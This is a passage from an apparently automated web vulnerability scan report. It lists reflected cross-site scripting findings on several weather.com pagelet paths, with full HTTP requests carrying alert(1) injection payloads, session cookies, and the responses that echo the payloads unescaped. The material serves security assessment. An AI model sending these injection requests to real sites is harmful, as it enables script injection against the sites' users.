Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:39:00 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 1096968725
Date: Thu, 24 Mar 2011 17:38:30 GMT
Connection: keep-alive
Content-Length: 159965

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletd0323"><script>alert(1)</script>8da94951a16/bc/59233" />
...[SNIP]...
1.9. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe598"-alert(1)-"87ff45b15a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletfe598"-alert(1)-"87ff45b15a9/bc/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:39:05 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x01
X-Varnish: 624658701
Date: Thu, 24 Mar 2011 17:38:35 GMT
Connection: keep-alive
Content-Length: 159858

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pageletfe598"-alert(1)-"87ff45b15a9/bc/59233",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...
1.10. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15553"-alert(1)-"15f2e7eef1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/bc15553"-alert(1)-"15f2e7eef1b/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:40 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x05
X-Varnish: 1096972002
Date: Thu, 24 Mar 2011 17:38:40 GMT
Connection: keep-alive
Content-Length: 108349

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/bc15553"-alert(1)-"15f2e7eef1b/59233",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.11. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc26"-alert(1)-"dee469a1c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletcfc26"-alert(1)-"dee469a1c86/bc/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:41 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x04
X-Varnish: 2366485569
Date: Thu, 24 Mar 2011 17:36:11 GMT
Connection: keep-alive
Content-Length: 159897

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pageletcfc26"-alert(1)-"dee469a1c86/bc/62264",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...
1.12. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de8e4"><script>alert(1)</script>2e617dc8ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletde8e4"><script>alert(1)</script>2e617dc8ea/bc/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:36 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x03
X-Varnish: 2366483928
Date: Thu, 24 Mar 2011 17:36:06 GMT
Connection: keep-alive
Content-Length: 159897

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletde8e4"><script>alert(1)</script>2e617dc8ea/bc/62264" />
...[SNIP]...
1.13. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248e6"-alert(1)-"b2076ddb63a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/bc248e6"-alert(1)-"b2076ddb63a/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:15 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x05
X-Varnish: 1510843635
Date: Thu, 24 Mar 2011 17:36:15 GMT
Connection: keep-alive
Content-Length: 108373

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/bc248e6"-alert(1)-"b2076ddb63a/62264",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.14. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3ae4"-alert(1)-"d7648350a81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelete3ae4"-alert(1)-"d7648350a81/loc/?i=0^noId&rnd=1300988008961 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:10 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x03
X-Varnish: 1096914746
Date: Thu, 24 Mar 2011 17:35:40 GMT
Connection: keep-alive
Content-Length: 159842

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelete3ae4"-alert(1)-"d7648350a81/loc/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.15. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d827"><script>alert(1)</script>20ffba2a649 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet9d827"><script>alert(1)</script>20ffba2a649/loc/?i=0^noId&rnd=1300988008961 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:05 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x04
X-Varnish: 1156335400
Date: Thu, 24 Mar 2011 17:35:35 GMT
Connection: keep-alive
Content-Length: 159920

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet9d827"><script>alert(1)</script>20ffba2a649/loc/" />
...[SNIP]...
1.16. http://www.weather.com/pagelet/loc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34e99"-alert(1)-"7e7a13b6793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/loc34e99"-alert(1)-"7e7a13b6793/?i=0^noId&rnd=1300988008961 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:40:46 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x05
X-Varnish: 1096916647
Date: Thu, 24 Mar 2011 17:35:46 GMT
Connection: keep-alive
Content-Length: 108345

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/loc34e99"-alert(1)-"7e7a13b6793/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.17. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6673d"><script>alert(1)</script>bb9577b79b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet6673d"><script>alert(1)</script>bb9577b79b5/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; 